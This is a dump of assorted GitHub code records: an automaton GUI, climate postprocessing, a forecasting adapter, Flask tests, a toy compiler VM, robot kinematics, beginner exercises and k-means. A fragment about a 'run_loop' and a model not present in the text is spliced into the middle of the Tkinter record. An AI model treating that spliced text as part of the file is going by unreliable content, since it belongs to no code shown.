messagebox.showinfo(\"Información\", \"Autómata cargado correctamente\")\n\n def LoadAutomatonFromInput(self):\n data = self.input_entry2.get()\n if data:\n error = self.controller.LoadAutomataFromString(data)\n if error is not None:\n messagebox.showerror(\"Error\", \"Error al cargar el autómata: \" + error)\n else:\n messagebox.showinfo(\"Información\", \"Autómata cargado correctamente\")\n\n def SaveAutomataToFile(self):\n filepath = fd.asksaveasfilename(defaultextension=\".json\", filetypes=[(\"JSON Files\", \"*.json\")])\n if filepath:\n error = self.controller.SaveAutomataToFile(filepath)\n if error is not None:\n messagebox.showerror(\"Error\", \"Error al guardar el archivo: \" + error)\n else:\n messagebox.showinfo(\"Información\", \"Autómata guardado correctamente\")\n\n def ConvertToAFD(self):\n afd = self.controller.ConvertToDFA()\n if afd is not None:\n messagebox.showinfo(\"Información\", \"Autómata convertido a AFD correctamente\")\n else:\n messagebox.showerror(\"Error\", \"Error al convertir el autómata a AFD\")\n\n\n def VisualizeAutomata(self):\n self.controller.VisualizeAutomata()\n return None\n \n\n\n def Run(self):\n root = tk.Tk()\n root.title(\"Verificador de autómatas\")\n root.geometry(\"400x450\")\n\n # Crear los componentes de la interfaz\n label_home = tk.Label(root, text=\"¿Qué desea hacer?\")\n load_file_button = tk.Button(root, text=\"Cargar autómata desde archivo\", command=self.LoadAutomataFromFile, )\n label_automata = tk.Label(root, text=\"Ingrese una Automata manualmente:\")\n load_input_button = tk.Button(root, text=\"Cargar autómata desde entrada manual\", command=self.LoadAutomatonFromInput)\n self.input_entry2 = tk.Entry(root, width = 50)\n label_string= tk.Label(root, text=\"Ingrese una cadena para verificar:\")\n self.input_entry = tk.Entry(root, width = 50)\n verify_button = tk.Button(root, text=\"Verificar\", command=self.VerifyString)\n save_file_button = tk.Button(root, text=\"Guardar autómata en archivo\", 
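run_loop above accumulates the live loss tensor (`total_loss += loss`), which keeps each batch's autograd graph alive until the epoch ends; calling `.item()` as it accumulates detaches instead. A self-contained variant with a toy stand-in for the FullHistory model (shapes and data are synthetic):

import torch
from torch import nn

class ToyModel(nn.Module):
    # stand-in for FullHistory: forward takes (trip, hist) like the model above
    def __init__(self):
        super().__init__()
        self.lin = nn.Linear(6, 1)

    def forward(self, trip, hist):
        return self.lin(torch.cat([trip, hist], dim=1))

def run_loop(model, dl, loss_func, step=False, optimizer=None):
    total_loss = 0.0
    for trip, hist, y in dl:
        loss = loss_func(model(trip, hist), y)
        if step:
            loss.backward()
            optimizer.step()
            optimizer.zero_grad()
        total_loss += loss.item()   # detached float, no retained graph
    return total_loss / len(dl)

dl = [(torch.randn(8, 3), torch.randn(8, 3), torch.randn(8, 1)) for _ in range(4)]
model = ToyModel()
opt = torch.optim.Adam(model.parameters(), lr=1e-3)
print(run_loop(model, dl, nn.MSELoss(), step=True, optimizer=opt))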
command=self.SaveAutomataToFile)\n visualize_button = tk.Button(root, text=\"Visualizar autómata\", command=self.VisualizeAutomata)\n convert_button = tk.Button(root, text=\"Convertir a AFD\", command=self.ConvertToAFD)\n \n\n # Colocar los componentes en la ventana\n label_home.pack(padx=10, pady=5)\n\n load_file_button.pack(padx=25, pady=20)\n\n label_automata.pack(padx=10, pady=5)\n self.input_entry2.pack(padx=25, pady=5)\n load_input_button.pack(padx=25, pady=5)\n \n\n label_string.pack(padx=25, pady=5)\n self.input_entry.pack(padx=25, pady=5)\n verify_button.pack(padx=25, pady=5)\n \n \n save_file_button.pack(padx=25, pady=10)\n visualize_button.pack(padx=25, pady=10)\n convert_button.pack(padx=25, pady=10)\n\n root.mainloop()\n","repo_name":"Mttzputnik/ProyectoAutomatas3","sub_path":"views/view2.py","file_name":"view2.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30072466723","text":"import os\nimport sys\nimport datetime\nimport xarray as xr\n\n# processed runs\nPROC_RUNS = ['alpcyc4.2km.grip.0820', 'alpcyc4.2km.grip.1040.pp',\n 'alpcyc4.2km.epica.0970', 'alpcyc4.2km.epica.1220.pp',\n 'alpcyc4.2km.md012444.0800', 'alpcyc4.2km.md012444.1060.pp',\n 'alpcyc4.1km.epica.1220.pp']\nPROC_RUNS = [PROC_RUNS[-1]]\n\n# global attributes\nGLOB_ATTRS = dict(\n title='Alpine ice sheet glacial cycle erosion continuous variables',\n author='Julien Seguinot',\n institution='ETH Zürich, Switzerland',\n command='{user}@{host} {time}: {cmdl}\\n'.format(\n user=os.environ['USER'], host=os.uname()[1], cmdl=' '.join(sys.argv),\n time=datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')))\n\n\ndef postprocess_extra(run_path):\n \"\"\"Postprocess extra dataset for one run.\"\"\"\n\n # output file and subtitle\n _, res, rec, *other = os.path.basename(run_path).split('.')\n out_file = 'processed/alpero.{}.{}.{}.cts.nc'.format(\n res, rec[:4], 'pp' if 'pp' in other else 'cp')\n subtitle = '{} {} simulation {} precipitation reductions'.format(\n res, rec.upper(), 'with' if 'pp' in other else 'without')\n\n # load output data (in the future combine='by_coords' will be the default)\n print(\"postprocessing \" + out_file + \"...\")\n ex = xr.open_mfdataset(run_path+'/ex.???????.nc', decode_times=False,\n chunks=dict(time=50), combine='by_coords',\n data_vars='minimal', attrs_file=-1)\n\n # get global attributes from last file (issue #2382, fixed locally)\n # last = xr.open_dataset(run_path+'/ex.0120000.nc', decode_times=False)\n # ex.attrs = last.attrs\n # last.close()\n\n # add new coordinates\n ex = ex.assign_coords(time=ex.time/(-365.0*24*60*60))\n ex = ex.assign_coords(age=-ex.time)\n\n # register new variables\n ex['sliding'] = ex.velbase_mag.where(ex.thk >= 1.0)\n ex['erosion'] = (2.7e-7*ex.sliding**2.02).assign_attrs(\n long_name='volumic glacial erosion rate', units='m year-1')\n\n # select variables to export and update global attributes\n pp = ex[['erosion']].sel(time=ex.time[9::10])\n pp.attrs.update(subtitle=subtitle, **GLOB_ATTRS)\n pp.attrs.update(history=pp.command+pp.history)\n\n # export to netcdf\n pp.to_netcdf(out_file, mode='w', encoding={var: dict(\n zlib=True, shuffle=True, complevel=1) for var in pp.variables})\n\n\ndef main():\n \"\"\"Main program called during execution.\"\"\"\n\n # create directory if missing\n if not os.path.exists('processed'):\n os.makedirs('processed')\n\n # activate dask client http://localhost:8787/status\n # from dask.distributed import Client\n # 
print(Client().scheduler_info()['services'])\n\n # postprocess selected runs\n for run in PROC_RUNS:\n postprocess_extra(os.environ['HOME'] + '/pism/output/e9d2d1f/' + run)\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"juseg/alps","sub_path":"data/postprocess_alpero_cts.py","file_name":"postprocess_alpero_cts.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32913720189","text":"import warnings\nfrom .steem import Steem\n\nwarnings.simplefilter('always', DeprecationWarning)\nwarnings.warn(\n \"\"\"\\n\n The python-steem brand has been overtaken by Steemit Inc. and is no\n longer available for our python development! You can find the\n rebranded library as 'piston-lib' and can use it by simply replacing\n from steem.X import Y\n by\n from piston.X import Y\"\"\",\n DeprecationWarning\n)\n\n__all__ = [\n \"aes\",\n \"amount\",\n \"post\",\n \"profile\",\n \"steem\",\n \"storage\",\n \"wallet\",\n \"dex\",\n \"transactions\",\n \"witness\",\n \"instance\",\n \"data\",\n]\n","repo_name":"AnCh7/sweetshot","sub_path":"python3-src/steem/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"44024958870","text":"from copy import copy\nfrom functools import partial\nfrom typing import Any, Callable, Dict, List, Optional, Union\n\nimport torchmetrics\nfrom torch import Tensor\n\nfrom flash.core.adapter import Adapter\nfrom flash.core.data.batch import default_uncollate\nfrom flash.core.data.io.input import DataKeys\nfrom flash.core.model import Task\nfrom flash.core.utilities.imports import _FORECASTING_AVAILABLE, _PANDAS_AVAILABLE\n\nif _PANDAS_AVAILABLE:\n from pandas import DataFrame\nelse:\n DataFrame = object\n\nif _FORECASTING_AVAILABLE:\n from pytorch_forecasting import TimeSeriesDataSet\nelse:\n TimeSeriesDataSet = object\n\n\nclass PatchTimeSeriesDataSet(TimeSeriesDataSet):\n \"\"\"Hack to prevent index construction or data validation / conversion when instantiating model.\n\n This enables the ``TimeSeriesDataSet`` to be created from a single row of data.\n\n \"\"\"\n\n def _construct_index(self, data: DataFrame, predict_mode: bool) -> DataFrame:\n return DataFrame()\n\n def _data_to_tensors(self, data: DataFrame) -> Dict[str, Tensor]:\n return {}\n\n\nclass PyTorchForecastingAdapter(Adapter):\n \"\"\"The ``PyTorchForecastingAdapter`` is an :class:`~flash.core.adapter.Adapter` for integrating with PyTorch\n Forecasting.\"\"\"\n\n def __init__(self, backbone):\n super().__init__()\n\n self.backbone = backbone\n\n @staticmethod\n def _collate_fn(collate_fn, samples):\n samples = [(sample[DataKeys.INPUT], sample[DataKeys.TARGET]) for sample in samples]\n batch = collate_fn(samples)\n return {DataKeys.INPUT: batch[0], DataKeys.TARGET: batch[1]}\n\n @classmethod\n def from_task(\n cls,\n task: Task,\n parameters: Dict[str, Any],\n backbone: str,\n backbone_kwargs: Optional[Dict[str, Any]] = None,\n loss_fn: Optional[Callable] = None,\n metrics: Optional[Union[torchmetrics.Metric, List[torchmetrics.Metric]]] = None,\n ) -> Adapter:\n parameters = copy(parameters)\n # Remove the single row of data from the parameters to reconstruct the `time_series_dataset`\n data = DataFrame.from_dict(parameters.pop(\"data_sample\"))\n time_series_dataset = PatchTimeSeriesDataSet.from_parameters(parameters, data)\n\n backbone_kwargs[\"loss\"] = loss_fn\n\n if 
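The erosion law applied in postprocess_extra above is a plain power law, erosion = 2.7e-7 * sliding**2.02 (m/year in, m/year out); the same arithmetic on bare numpy values:

import numpy as np

sliding = np.array([1.0, 10.0, 100.0])   # illustrative basal sliding speeds, m/year
erosion = 2.7e-7 * sliding ** 2.02
print(erosion)  # [2.7e-07 ~2.8e-05 ~3.0e-03] m/year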
metrics is not None and not isinstance(metrics, list):\n metrics = [metrics]\n backbone_kwargs[\"logging_metrics\"] = metrics\n\n backbone_kwargs = backbone_kwargs or {}\n\n adapter = cls(task.backbones.get(backbone)(time_series_dataset=time_series_dataset, **backbone_kwargs))\n\n # Attach the required collate function\n adapter.collate_fn = partial(PyTorchForecastingAdapter._collate_fn, time_series_dataset._collate_fn)\n\n return adapter\n\n def training_step(self, batch: Any, batch_idx: int) -> Any:\n batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])\n return self.backbone.training_step(batch, batch_idx)\n\n def validation_step(self, batch: Any, batch_idx: int) -> Any:\n batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])\n return self.backbone.validation_step(batch, batch_idx)\n\n def test_step(self, batch: Any, batch_idx: int) -> None:\n raise NotImplementedError(\n \"Backbones provided by PyTorch Forecasting don't support testing. Use validation instead.\"\n )\n\n def forward(self, x: Any) -> Any:\n return dict(self.backbone(x))\n\n def predict_step(self, batch: Any, batch_idx: int, dataloader_idx: int = 0) -> Any:\n result = self(batch[DataKeys.INPUT])\n result[DataKeys.INPUT] = default_uncollate(batch[DataKeys.INPUT])\n return default_uncollate(result)\n\n def training_epoch_end(self, outputs) -> None:\n self.backbone.training_epoch_end(outputs)\n\n def validation_epoch_end(self, outputs) -> None:\n self.backbone.validation_epoch_end(outputs)\n","repo_name":"Lightning-Universe/lightning-flash","sub_path":"src/flash/core/integrations/pytorch_forecasting/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":1717,"dataset":"github-code","pt":"7"} +{"seq_id":"71570462623","text":"from enum import IntEnum\n\nfrom bs4 import BeautifulSoup\nfrom flask import url_for\n\nfrom app import format_datetime_short\n\nvalid_letter_jobs = [\n {\n 'service_name': {'name': 'test_name'},\n 'id': 'test_id',\n 'notification_count': 2,\n 'job_status': 'ready to send',\n 'created_at': '2017-04-01T12:00:00'\n },\n {\n 'service_name': {'name': 'test_name 2'},\n 'id': 'test_id 2',\n 'notification_count': 1,\n 'job_status': 'sent to dvla',\n 'created_at': '2017-04-02T13:00:00'\n },\n {\n 'service_name': {'name': 'test_name 3'},\n 'id': 'test_id 3',\n 'notification_count': 1,\n 'job_status': 'in progress',\n 'created_at': '2017-04-03T14:00:00'\n }\n]\n\nsend_letter_jobs_response = {\"response\": \"Task created to send files to DVLA\"}\n\n\nclass LetterJobsHeader(IntEnum):\n SERVICE_NAME = 0\n JOB_ID = 1\n NOTIFICATION_COUNT = 2\n JOB_STATUS = 3\n CREATED_AT = 4\n CHECKBOX = 5\n TEMP_STATUS = 6\n\n\ndef test_get_letter_jobs_returns_list_of_all_letter_jobs(logged_in_platform_admin_client, mocker):\n mock_get_letters = mocker.patch('app.letter_jobs_client.get_letter_jobs', return_value=valid_letter_jobs)\n\n response = logged_in_platform_admin_client.get(url_for('main.letter_jobs'))\n\n assert mock_get_letters.called\n assert response.status_code == 200\n\n page = BeautifulSoup(response.data.decode('utf-8'), 'html.parser')\n assert page.h1.string == 'Letter jobs'\n\n rows = page.select('table tbody tr')\n\n assert len(rows) == len(valid_letter_jobs)\n\n for row_pos in range(len(rows)):\n cols = rows[row_pos].find_all('td')\n assert valid_letter_jobs[row_pos]['service_name']['name'] == cols[LetterJobsHeader.SERVICE_NAME].text\n assert valid_letter_jobs[row_pos]['id'] == cols[LetterJobsHeader.JOB_ID].text\n assert 
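A standalone sketch of the collate remapping in PyTorchForecastingAdapter._collate_fn above: a library collate that expects (input, target) pairs is wrapped with functools.partial so it can consume dict-shaped samples (plain strings stand in for DataKeys.INPUT/TARGET):

from functools import partial

def library_collate(samples):
    # stand-in for TimeSeriesDataSet._collate_fn
    inputs, targets = zip(*samples)
    return list(inputs), list(targets)

def adapter_collate(collate_fn, samples):
    pairs = [(s["input"], s["target"]) for s in samples]
    batch = collate_fn(pairs)
    return {"input": batch[0], "target": batch[1]}

collate = partial(adapter_collate, library_collate)
print(collate([{"input": 1, "target": 2}, {"input": 3, "target": 4}]))
# {'input': [1, 3], 'target': [2, 4]}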
valid_letter_jobs[row_pos]['notification_count'] == int(cols[LetterJobsHeader.NOTIFICATION_COUNT].text)\n assert valid_letter_jobs[row_pos]['job_status'] == cols[LetterJobsHeader.JOB_STATUS].text\n assert format_datetime_short(\n valid_letter_jobs[row_pos]['created_at']) == cols[LetterJobsHeader.CREATED_AT].text\n if not (valid_letter_jobs[row_pos]['job_status'] == 'ready to send' or\n valid_letter_jobs[row_pos]['job_status'] == 'sent to dvla'):\n assert 'disabled' in str(cols[LetterJobsHeader.CHECKBOX])\n\n\ndef test_post_letter_jobs_select_1_letter_job_submits_1_job(logged_in_platform_admin_client, mocker):\n letter_jobs_first_selected = {'job_id': ['test_id']}\n\n mock_get_letters = mocker.patch('app.letter_jobs_client.get_letter_jobs', return_value=valid_letter_jobs)\n mock_send_letters = mocker.patch('app.letter_jobs_client.send_letter_jobs', return_value=send_letter_jobs_response)\n\n response = logged_in_platform_admin_client.post(url_for('main.letter_jobs'), data=letter_jobs_first_selected,\n follow_redirects=True)\n\n assert mock_get_letters.called\n assert mock_send_letters.called\n assert response.status_code == 200\n\n page = BeautifulSoup(response.data.decode('utf-8'), 'html.parser')\n\n rows = page.select('table tbody tr')\n\n assert len(rows) == len(valid_letter_jobs)\n\n colr0 = rows[0].find_all('td')\n colr1 = rows[1].find_all('td')\n colr2 = rows[2].find_all('td')\n\n assert colr0[LetterJobsHeader.TEMP_STATUS].text == \"sending\"\n assert colr1[LetterJobsHeader.TEMP_STATUS].text == \"\"\n assert colr2[LetterJobsHeader.TEMP_STATUS].text == \"\"\n\n message = page.find('p', attrs={'id': 'message'}).text\n assert \"Task created to send files to DVLA\" in message\n\n\ndef test_post_letter_jobs_none_selected_shows_message(logged_in_platform_admin_client, mocker):\n mock_get_letters = mocker.patch('app.letter_jobs_client.get_letter_jobs', return_value=valid_letter_jobs)\n mock_send_letters = mocker.patch('app.letter_jobs_client.send_letter_jobs', return_value=send_letter_jobs_response)\n\n response = logged_in_platform_admin_client.post(url_for('main.letter_jobs'), data={}, follow_redirects=True)\n\n assert mock_get_letters.called\n assert not mock_send_letters.called\n assert response.status_code == 200\n\n page = BeautifulSoup(response.data.decode('utf-8'), 'html.parser')\n message = page.find('p', attrs={'id': 'message'}).text\n\n assert \"No jobs selected\" in message\n","repo_name":"govau/notify","sub_path":"admin/tests/app/main/views/test_letter_jobs.py","file_name":"test_letter_jobs.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"7"} +{"seq_id":"20413080272","text":"from semantic import Pro\nimport os\n\ndef find_value(name):\n value = 0\n if name in p.temp_list:\n for i, t in enumerate(p.temp_list):\n if t.name == str(name):\n value = t.value\n elif name in p.chart:\n value = p.chart[name]\n else:\n value = int(name)\n return value\n\n\ndef _op(op, P1, P2):\n p1 = find_value(P1)\n p2 = find_value(P2)\n\n if op == '+':\n return p1 + p2\n elif op == '-':\n return p1 - p2\n elif op == '*':\n return p1 * p2\n elif op == '/':\n return p1 // p2\n elif op == '>':\n if p1 > p2:\n return 1\n return 0\n elif op == '<':\n if p1 < p2:\n return 1\n return 0\n elif op == '==':\n if p1 == p2:\n return 1\n return 0\n elif op == '>=':\n if p1 >= p2:\n return 1\n return 0\n elif op == '<=':\n if p1 <= p2:\n return 1\n return 0\n elif op == '!=':\n if p1 != p2:\n return 1\n return 0\n elif op == 
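The LetterJobsHeader trick in the tests above works because IntEnum members behave as plain ints, so they can index a row's cells directly:

from enum import IntEnum

class Header(IntEnum):
    SERVICE_NAME = 0
    JOB_ID = 1

row = ["test_name", "test_id"]
print(row[Header.JOB_ID])  # test_id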
'&&':\n if p1 == 1 and p2 == 1:\n return 1\n return 0\n elif op == '||':\n if p1 == 0 and p2 == 0:\n return 0\n return 1 \n\n\ndef VM(chart,newT,sequence,seq_index):\n\n if os.path.exists('Result.txt'):\n os.remove('Result.txt')\n\n\n\n global p\n p = Pro()\n p.chart = chart # 符号表 类型:dict\n p.temp_list = newT # 临时变量表 类型:NewT\n p.seq_list = sequence # 四元式表 类型:Sequence\n p.seq_index=seq_index #主函数四元式开始的位置\n # 测试使用,将符号表与临时变量表的value置为0\n for i in p.chart.keys():\n p.chart[i] = 0\n for i in range(p.temp_list.__len__()):\n p.temp_list[i].value = 0\n\n print('-------------------------------------')\n #index = 3\n #print(seq_index)\n index=int(p.seq_index)\n while index < len(p.seq_list):\n item = p.seq_list[int(index)]\n if item.action == '=':\n index += 1\n if item.p1 in p.temp_list:\n for i, t in enumerate(p.temp_list):\n if t.name == str(item.p1):\n p.chart[item.result] = p.temp_list[i].value\n else:\n p.chart[item.result] = item.p1\n elif item.action == 'j=':\n flag = find_value(item.p2)\n if flag == item.p1:\n index = item.result.value\n else:\n index += 1\n elif item.action == 'j':\n index = item.result.value\n elif item.action == 'out':\n index += 1\n t = find_value(item.p1)\n with open('Result.txt', 'a+') as f:\n print('输出:', t)\n f.write('{:2}\\n'.format(t))\n elif item.action == 'in':\n index += 1\n if item.p1 in p.chart:\n t = eval(input('输入:'))\n p.chart[item.p1] = t\n else:\n print(\"变量未定义\")\n else:\n index += 1\n if item.result in p.chart:\n p.chart[item.result] = _op(item.action, item.p1, item.p2)\n elif item.result in p.temp_list:\n for i,t in enumerate(p.temp_list):\n if t.name == str(item.result):\n p.temp_list[i].value = _op(item.action, item.p1, item.p2)\n\n # print('将抽象机结果赋给了符号表与临时变量表')\n print(p.chart)\n print(p.temp_list)\n #对符号表进行管理,重新赋值\n if os.path.exists('Parameters.txt'):\n os.remove('Parameters.txt')\n with open('Parameters.txt','a+') as f:\n for i in p.chart.keys():\n f.write('name:{:2} value:{}\\n'.format(i,p.chart.get(i)))\n for i in p.temp_list:\n f.write('name:{:2} value:{}\\n'.format(i.name,i.value))\n\nif __name__ == '__main__':\n VM()","repo_name":"pickxiguapi/MiniC-Compiler","sub_path":"vm.py","file_name":"vm.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"} +{"seq_id":"35105284708","text":"\n # Basic - Print all integers from 0 to 150.\ndef all ():\n for x in range (0,151,1):\n print(x)\nall()\n\n\n# Multiples of Five - Print all the multiples of 5 from 5 to 1,000\ndef multiples ():\n for x in range (0,1001,5):\n if x % 5 == 0:\n print(x)\n# multiples()\n\n\n# Counting, the Dojo Way - Print integers 1 to 100. If divisible by 5, print \"Coding\" instead. If divisible by 10, print \"Coding Dojo\".\n\ndef divisible ():\n for x in range (1,101,1):\n if x % 5 == 0:\n print(\"Coding\")\n if x % 10 == 0:\n print(\"Coding Dojo\")\n else:\n print(x)\n# divisible()\n\n\n# Whoa. That Sucker's Huge - Add odd integers from 0 to 500,000, and print the final sum.\ndef odd ():\n for x in range(0,500):\n if x % 2 == 1:\n print(x)\n\n # Countdown by Fours - Print positive numbers starting at 2018, counting down by fours\ndef positive ():\n for x in range(2018,0,-4):\n print(x)\n # Flexible Counter - Set three variables: lowNum, highNum, mult. Starting at lowNum and going through highNum, print only the integers that are a multiple of mult. 
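A table-driven alternative to the if/elif chain in _op above, keeping the same semantics (floor division, 0/1 booleans):

import operator

OPS = {
    '+': operator.add, '-': operator.sub, '*': operator.mul,
    '/': operator.floordiv,
    '>': lambda a, b: int(a > b), '<': lambda a, b: int(a < b),
    '==': lambda a, b: int(a == b), '!=': lambda a, b: int(a != b),
    '>=': lambda a, b: int(a >= b), '<=': lambda a, b: int(a <= b),
    '&&': lambda a, b: int(a == 1 and b == 1),
    '||': lambda a, b: int(not (a == 0 and b == 0)),
}

print(OPS['/'](7, 2), OPS['&&'](1, 1), OPS['||'](0, 0))  # 3 1 0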
For example, if lowNum=2, highNum=9, and mult=3, the loop should print 3, 6, 9 (on successive lines) \nlownum=2\nhighnum=10\nmult=3\n\nfor x in range(lownum,highnum):\n if x % 3 == 0:\n print (x)\n ","repo_name":"bintad/hellopython","sub_path":"for_loop_basic1.py","file_name":"for_loop_basic1.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22434219935","text":"from modern_robotics import core\nimport numpy as np\nfrom numpy import cos, sin\nfrom math import pi\nimport csv\n\n\n\"\"\"\nCode for Milestone 1: Next State.\nIn this code I wrote a function NextState to simulate the kinematics of the youBot.\nThis function compute the configuration of the robot in the next time step.\nThe next step is saved in an csv file 'next_state.csv'.\n\"\"\"\n\n\ndef NextState(current_config, speeds, delta_t, max_ang_speed):\n \"\"\" This function compute the configuration of the robot in the next time step.\n\n The function NextState is based on a simple first-order Euler step, i.e.:\n - new arm joint angles = (old arm joint angles) + (joint speeds) * Δt\t\t(Equation 1)\n - new wheel angles = (old wheel angles) + (wheel speeds) * Δt\t\t\t\t(Equation 2)\n - new chassis configuration is obtained from odometry (as described in Chapter 13.4)\n\n Input:\n current_config - A 12-vector representing the current configuration of the robot (3 variables for\n the chassis configuration, 5 variables for the arm configuration, and 4 variables\n for the wheel angles).\n speeds - A 9-vector of controls indicating the arm joint speeds theta_dot (5 variables) and the\n wheel speeds u (4 variables).\n delta_t - The time step Δt.\n max_ang_speed - A positive real value indicating the maximum angular speed of the arm joints and\n the wheels.\n\n Return: \n new_config - A 12-vector representing the configuration of the robot time Δt later.\n \"\"\"\n # Initialize variables:\n # The forward-backward distance between the wheels to frame {b} [m]\n l = 0.47/2\n w = 0.3/2\t\t\t# The side-to-side distance between the wheels to frame {b} [m]\n r = 0.0475\t\t\t# The radius of each wheel [m]\n\n # Get current chassis configuration, arm configuration (joints angles) and wheel angles:\n current_q = current_config[:3]\n current_joint_ang = current_config[3:8]\n current_wheel_ang = current_config[8:12]\n\n # Restrict the speeds executed by the wheels and joints to the maximum speed:\n for i in range(len(speeds)):\n abs_speed = abs(speeds[i])\n if abs_speed > max_ang_speed:\n speeds[i] = speeds[i]/abs_speed * max_ang_speed\n\n # Get current arm joint speeds and wheel speeds (with restricted speeds):\n theta_dot = speeds[:5]\n u = speeds[5:]\n\n # Calculate new arm joint angles and wheel angles (according to equations 1,2):\n new_joint_ang = current_joint_ang + theta_dot * delta_t\n new_wheel_ang = current_wheel_ang + u * delta_t\n\n # Calculate new chasis configuration (according to Chapter 13.4):\n F = r/4 * np.array([[-1/(l + w), 1/(l + w), 1/(l + w), -1/(l + w)],\n [1, 1, 1, 1],\n [-1, 1, -1, 1]])\n Vb = F.dot((u * delta_t).T).T\n w_bz, v_bx, v_by = Vb\n\n if w_bz == 0.:\n delta_qb = np.array([0, v_bx, v_by]).T\n else:\n delta_qb = np.array([w_bz, (v_bx * sin(w_bz) + v_by * (cos(w_bz) - 1))/w_bz,\n (v_by * sin(w_bz) + v_bx * (1 - cos(w_bz)))/w_bz])\n\n # Transforming the ∆q b in {b} to ∆q in the fixed frame {s} using the chassis angle:\n chassis_angle = current_config[0]\n Tsb = np.array([[1, 0,\t\t\t\t\t 0],\n [0, 
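Two of the exercises above don't do what their comments say: odd() prints odds below 500 instead of summing odds up to 500,000, and the Flexible Counter loop tests x % 3 rather than x % mult. A corrected sketch of the sum:

def odd_sum():
    total = 0
    for x in range(1, 500001, 2):
        total += x
    print(total)

odd_sum()  # 62500000000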
cos(chassis_angle), -sin(chassis_angle)],\n                    [0, sin(chassis_angle), cos(chassis_angle)]])\n    delta_q = Tsb.dot(delta_qb.T)\n\n    # Calculating the new chassis configuration:\n    new_q = current_q + delta_q\n\n    # Combining the three vectors to the new configuration vector:\n    new_config = np.concatenate(\n        (new_q, new_joint_ang, new_wheel_ang), axis=None)\n\n    return new_config\n\n\n########## Testing the NextState Function ##########\n\n# Initialize variables:\n# The initial configuration of the youBot (3 chassis configuration variables, 5 arm joint angles, 4 wheel angles, and \"0\" for \"gripper open\"):\ncurrent_config = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n# The speeds vector (arm joint speeds = (0, 0, 0, 0, 0), wheel speeds = (-10, 10, -10, 10)):\n# The robot chassis should slide sideways in the y_b direction\nspeeds = np.array([0, 0, 0, 0, 0, -10, 10, -10, 10])\n\n# Restrictions on the speeds vector:\nmax_ang_speed = 5\n\n# Time variables:\ndelta_t = 0.01\t\t\t\t\t\t# Time step [sec]\nt_total = 1\t\t\t\t\t\t\t# Simulation run time [sec]\niteration = int(t_total/delta_t) # Number of iterations\n\n# Initialize configuration array (with current_config as the first row):\nconfig_array = np.zeros((iteration, 13))\nconfig_array[0] = current_config\n\n# Calculate the new configuration for every iteration:\nfor i in range(1, iteration):\n    current_config = NextState(current_config, speeds, delta_t, max_ang_speed)\n    config_array[i][:12] = current_config\n\n# Save the 13-element configurations as a csv file:\nwith open("next_state.csv", "w+") as my_csv:\n    csvWriter = csv.writer(my_csv, delimiter=',')\n    csvWriter.writerows(config_array)\n","repo_name":"YaelBenShalom/Mobile-Manipulation","sub_path":"code/Next_State.py","file_name":"Next_State.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"}
{"seq_id":"21915119790","text":"\nfrom sklearn import cluster as c\nimport numpy as np\nimport pandas as pd\nimport csv\nimport operator\nfrom collections import defaultdict\n\ndf = pd.read_csv('vectors.csv')\nkmeans = c.KMeans(n_clusters=10, random_state=0).fit(df)\nprint(\"cluster created\")\nReviews = df.values\nlabels = kmeans.labels_\nclusters = defaultdict(list)\nfor i in range(len(labels)):\n    clusters[labels[i]].append(Reviews[i])\n\nwith open('Top5_Cluster.txt', \"w+\") as file1:\n    for label in sorted(clusters):\n        print(\"for cluster \" + str(label))\n        file1.write(\"for cluster \" + str(label) + '\\n')\n        cluster = pd.DataFrame(clusters[label], columns=df.columns)\n        sums = {}\n        for col in df.columns:\n            sums[col] = cluster[col].sum()\n        sorted_labels = sorted(sums.items(), key=operator.itemgetter(1), reverse=True)\n        for j in range(min(5, len(sorted_labels))):\n            print(sorted_labels[j])\n            file1.write(str(sorted_labels[j]))\n            file1.write('\\n')\n","repo_name":"RashmiShivanna/FineFoods_Review","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"17417321521","text":"# -*- coding: utf8 -*-\n\"\"\"\n==============================================\n:mod:`onebot.plugins.users` Users plugin\n==============================================\n\nKeeps track of the users in channels. 
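A numeric check of the odometry step inside NextState above: zero angular velocity reduces the body displacement to pure translation, otherwise the Chapter 13.4 closed form applies:

import numpy as np
from numpy import sin, cos

def delta_qb(w_bz, v_bx, v_by):
    if w_bz == 0.0:
        return np.array([0.0, v_bx, v_by])
    return np.array([w_bz,
                     (v_bx * sin(w_bz) + v_by * (cos(w_bz) - 1)) / w_bz,
                     (v_by * sin(w_bz) + v_bx * (1 - cos(w_bz))) / w_bz])

print(delta_qb(0.0, 1.0, 0.5))  # [0.  1.  0.5]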
